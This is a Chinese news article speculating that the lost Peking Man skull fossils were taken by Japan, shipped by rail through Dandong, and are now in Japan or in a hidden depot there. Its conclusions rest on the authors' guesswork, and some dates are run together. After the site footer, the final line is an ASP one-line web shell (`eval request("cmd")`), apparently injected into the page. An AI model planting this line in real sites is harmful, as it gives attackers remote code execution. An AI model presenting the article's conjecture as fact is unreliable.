大陆新闻

北京人头骨化石也许藏在丹东或经过丹东被盗运到日本

时间:2015-1-29 23:45:49  作者:李景科 于晓丹  来源:  查看:203  评论:0
内容摘要:关于“北京人”头骨化石的悬案和探索,已经过去七十多年了,曾经有过全球性的寻找浪潮,这些年又归于沉寂。一,阿波丸一说不足采信对于“北京人”头骨化石的去向有几种假说或预计。很多探索者认为 “北京人”头骨化石等很可...

关于“北京人”头骨化石的悬案和探索,已经过去七十多年了,曾经有过全球性的寻找浪潮,这些年又归于沉寂。

一,阿波丸一说不足采信

对于“北京人”头骨化石的去向有几种假说或预计。很多探索者认为 “北京人”头骨化石等很可能就在阿波丸沉船上。提出者所据史料是1945328日,被日本军队征用的阿波丸在新加坡装载了从东南亚一带撤退的大批日本人驶向日本。41日午夜时分,该船行至中国福建省牛山岛以东海域,被正在该海域巡航的美军潜水舰袭击,3分钟后迅速沉没。

  笔者为此,花费了很多时间查阅该船的航行停靠资料,结果是该船仅仅在去程中,停留在当时属于英国占的香港一夜。日本人根本没有可能和必要把北京人头骨化石等搬运到这艘远离北方的航船上。事实是,1945年4月1日23时该船在回程航经中国东海时候,被担负警戒作战任务的美国海军第17机动舰队因大雾误认为是日本海军驱逐舰而发射四枚鱼雷击沉于牛山岛附近(北纬25度26分01秒东经120度08分01秒)。

   事过几十年后,有国内探求者认为这是根据美国交给中国方面的资料,暗示说当年失踪的“北京人”头骨化石很可能就在沉没的阿波丸上。台湾《中国时报》19761121日还煞有介事地报道说:″阿波丸″被击沉时载有金锭40吨,白金12吨,未加工的宝石15万克拉,美、英、香港货币数捆,工艺品40箱,锡3000吨,钨2000吨,铝2000吨,钛800吨,橡胶2000吨。而事实上,1977113日,国务院和中央军委决定,由福州军区统一指挥,交通部和海军一起组织力量,对“阿波丸”沉船进行工程代号“7713”的打捞, 当年5 1日,发现“阿波丸”沉船已断成两段,前段长44.7米,后段长107.8米,埋入海底泥中911米,该处水深在6069米不等。随后打捞以“清除牛山渔场水下障碍物,保障海上渔业捕捞作业生产安全”的名义正式开工。1980年,海军“J503”号舰的指战员完成了拆解沉船首段的任务,穿引了船底 4道共14根千斤钢缆,上海救捞局的“大力号”海上自航浮吊船将首段一举吊浮,并拖抵平潭岛娘宫锚地搁上浅滩。整个作业共捞获锡锭2472吨,售价 5000余万美元,还有橡胶等货物数千吨以及一些其他东西,并未找到‘北京人’头骨化石。”也没有找到黄金,所以,“北京人”头骨化石等事实上没有在这艘船上。我国政府对于从阿波丸号打捞上来的遗骨368具,个人遗品1683件,在19797月,19801,19815月分三次全部发还给日本。

另外还有人认为该化石还在秦皇岛,长春,盛京(沈阳)等多种说法。实际也没有太多依据。

二,“北京人”头骨化石保存于北京协和医院

 据最后见到“北京人”头骨化石的我国古人类学家胡承志的关于化石的回忆。他说“包括‘北京人’头盖骨在内的周口店化石是我亲手打包装箱的。装好之后,我把箱子送到时任北京协和医院总务长博文的办公室。”作为亲历者,胡承志就 “北京人”化石的去向,从来是“几乎一声不吭,也没有写过一篇文章”。他仅仅愿意把“北京人”装箱前后的很多细节讲出来,为日后寻找“北京人”留下一些线索。这个细节是“化石装箱时间大约在1941128日珍珠港事件爆发前的18天到21天之间,也就是3个星期左右。”这缘于在194111月的一天上午,新生代研究室名誉主任魏敦瑞秘书通知胡承志“标本装箱运走”。当天下午,胡承志找到裴文中请示,裴文中同意“立即就装”。第二天,胡承志请协和医院解剖科技术员吉延卿帮忙,将“北京人”化石装箱了。 “化石被装在两只没有上漆的白色大木箱里,一大一小。大的长48英寸、宽22英寸、高11英寸;略小一点的木箱长45英寸,宽和高均为22英寸。”有人认为“日本人不懂化石,不可能参与”,对此,胡承志认为“因为化石包装得极考究,整整包了6层。但凡有点文化的人,即便不完全了解化石的真正价值,也不会轻易将之丢弃。”

三,日本相关者觊觎华北和东北古人类化石已久

那么日本人不懂化石吗?实际,恰恰相反,日本人对此很关心。而且在此之前也派有一些古人类和化石专家现在东北,北京和华北活动了。

贾兰坡之子贾彧彰公开过一封美国军医威廉•弗利写给考古学家贾兰坡的一封信。据说这是一封关涉“北京人”头盖骨化石下落的重要文件。这个信件证明了护送“北京人”的美国军医被日本人俘虏。但这封信现在也再也不见踪影。然而,由于128日爆发了珍珠港事件,日本军队迅速出动,占领了北京、天津等地的相关机构,“北京人”头盖骨从此下落不明。但事件的时间的线条则指向是日本人夺取了“北京人”头盖骨化石。

笔者查找了当时的一些文献资料,日本为了完全控制和同化他们当时统治的东北和台湾,配合军部,展开了对东北和华北的大规模长期的古物古迹调查。这个活动甚至早在1890年就开始了。而且在1930年以前,对中国的古物调查是日本在中国的主要“关切”事业之一。所以,当步达生(戴维森•布拉克,加拿大古人类学家,时任北京协和医学院解剖科主任)基于房山周口店村龙骨山发现两颗人属牙齿和1927年又发现一颗人属的左下臼齿在1927年发表了并命名了北京人。也立刻引起了日本政府和学术界的高度关注,日本学术界认为周口店的古人类化石和遗址对于“日本古代史是重要的经验”。因此,当第一个头盖骨于1929122日下午由我国古生物学家裴文中在“周口店第一地点”发现后,到19271937年共发掘出的较完整的头盖骨5个,头骨碎片9块,面骨碎片6块,下颌骨11个,牙齿147颗,股骨干7段,肱骨干2段,左锁骨的内侧半段,以及右月骨1块,并伴有大量动物化石和各种石器,改名北京直立人。这些过程自然都被在北京的日本情报机构所了解和觊觎。194112月太平洋战争爆发前后,日军迅速占领了北京和秦皇岛,并扣押了携带这些化石的美国人。所以,化石就是这样丢失了。

这此前后的一个历史时期,日本学术机构随着日军的占领,也进入东北,内蒙,热河和华北进行大规模学术考察,其中也包含古人类学的样本和遗址的搜集 ,这个机构最初是早稻田大学德永重康领导的“满蒙学术调查研究团”。在古人类的方面,他们当时有四大任务:搜集占领区以及临近区域的古人类文化遗迹和化石采集;了解地方宗教信仰;搜集共产势力在基层社会的发展;搜集苏俄蒙古的相关资料。这个打着科学旗号的大规模组织就是这样既搞中国古人类材料搜集,也搞情报搜集的。而古人类的材料搜集的单项的最高负责机构是当时日本的外务省对华文化事业部。当时,染指中国华北,东北的古人类化石研究有中島隆三,赤掘英三,远藤隆次等人。而在1941年前后,已经研究中国东部古人类有50年历史的日本古人类研究家中島隆三就在北京活动,而当时他正在任燕京大学教授,他在1893年进入东京帝国大学人类学研究室,1895年就进入辽东各个地区研究古人类。

四,被掠夺化石的去向经过安东是最佳的路线

 关于被掠夺的“北京人”头骨化石等的去向,笔者认为大概是在当时不久通过铁路线经过安东运到了日本,或是由于当时对美国战争的升级运输路途不安全,被保存在当时对日本最安全的“满日亲善”模范之地的安东(丹东)。

猜想过程如下。

1941年12月、从北京协和医院把装好的147枚北京人化石大箱子运到美国大使馆。目的地是通过物资运输船从秦皇岛港运往美国。由于美海军陆战队在秦皇岛的兵营也被日军侵占,护送化石的美国人弗利和戴维斯成了俘虏。当他们被移送到天津的战俘营后,弗利他们陆续收到从秦皇岛兵营运送来的行李,但北京人头骨化石的箱子已不见踪迹。由于日本海军控制了出港海上通道,预先乘坐的物资运输船出港不久,日本潜水舰还登船临时检查。笔者想这是特意安排的行动。船被放行并进入太平洋海域后,在鸟岛附近被日军鱼雷击沉。我认为这个击沉的行动也是预先确定的一次军事行动。

化石是在兵营就被日军带走了,通过天津—奉天的铁路运到沈阳,然后转乘奉天—安东的火车运到安东。由于日美已经宣战,在1941年底到1942年,当时的辽宁地区,特别是天津—奉天—安东—朝鲜汉城的铁路线是当时最安全的通道和地区。由于当时所有的海上,空中通道都受到美军的威胁,这个化石箱子保存在安东的某个隐蔽的军事仓库里的可能性是存在的。

五,日本在安东的经营

安东(今辽宁省丹东市),自甲午战争和日俄战争后,日本完全控制了安东地区,从1905年就开始经营建造从通远堡到安东县一线的地下军事仓库和秘密要塞群,一直到1945年才停止,持续了近四十年,至今有很多秘密仓库还没有被发现,所以,这也是最安全的藏物之处。

早期,日本也有人说这些化石被挟持到日本后,当时的东京大学人类学研究室古人类学家中島隆三就研究过了。他是通过当时在九州大学医学部一个副教授转交的。值得注意的是,在1941年,中島隆三就在北京做燕京大学的客座教授。所以,笔者认为,这不是偶然的,北京人头骨化石等的所谓“丢失”绝对与他有关。

 

 

也有日本学者说法,九州大学医学部解剖学研究室的该副教授把化石送到了距离九州大学三公里远的櫛田神社保存。但是,由于这个副教授在1947年患急性肺炎死亡了。就没有结果了。

基于以上所述,笔者认为,北京人头骨化石等的丢失是与日本人有绝对关系。也是被日本夺取了。现在化石的落脚之处90%%在日本,被永久秘密保存,还有10%可能,是在辽东的丹东地区某个还没有被发现的秘密军事仓库之中。由于在当时,这属于动员了多种力量的高度保密行动计划,所以,北京人头骨化石等被埋藏于秦皇岛,长春,盛京(沈阳)的可能性都不存在。
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):